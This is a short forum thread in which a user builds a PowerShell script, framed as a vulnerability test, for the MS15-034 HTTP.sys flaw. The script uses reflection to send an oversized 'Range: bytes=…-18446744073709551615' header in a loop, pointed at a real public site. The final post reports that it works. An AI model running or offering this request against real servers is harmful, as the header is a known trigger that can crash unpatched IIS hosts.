Powershell script to test latest HTTP vulnerability

This topic contains 4 replies, has 2 voices, and was last updated by Profile photo of GS GS 1 year, 11 months ago.

  • Author
    Posts
  • #24352
    Profile photo of GS
    GS
    Participant

    Hello,

    See here (https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/#33943)
    There is known exploit in the wild and we do not powershell way to test it. The one specified in this article does not work as AddRange would not allow to enter number bigger then Int64 and hence fail.
    We need to use Private method within WebHeader collection but I'm stuck since code below does not return actual object which it shall.

    [System.Net.WebHeaderCollection].GetType().GetMethod("AddWithoutValidate", 36) -eq $null

  • #24353
    Profile photo of Don Jones
    Don Jones
    Keymaster

    That code is performing a comparison, and it's always going to return $true or $false as a result.

  • #24355
    Profile photo of GS
    GS
    Participant

    Correct and it's always return $null, that means this object is not created which is needed to test code exploit since AddRange() method only accepts Int64 when in fact it needs to accept UInt64 and the only way to do that is to use this protected method which shall work but in Powershell it's not instantiated.

  • #24356
    Profile photo of GS
    GS
    Participant

    Actual code is below which does not work due the issue mentioned
    for ($inc=1;$inc++;$inc -le 1844674407370955161)
    {
    [System.Reflection.MethodInfo] $method = [System.Net.WebHeaderCollection].GetType().GetMethod("AddWithoutValidate",([System.Reflection.BindingFlags]::Instance -bor [System.Reflection.BindingFlags]::NonPublic));
    $httprequest=[system.Net.HTTPWEbRequest]::Create("http://www.microsoft.com/scripts/common.js")
    $params = @("Range", "bytes=$inc-18446744073709551615")
    $method.Invoke( $httprequest.Headers, $params)
    try
    {
    $response = $httprequest.GetResponse();
    $httpRequest.Close();
    }
    catch
    {}

  • #24360
    Profile photo of GS
    GS
    Participant

    Found it out. No need to GetType() after type, this works otherwise.

You must be logged in to reply to this topic.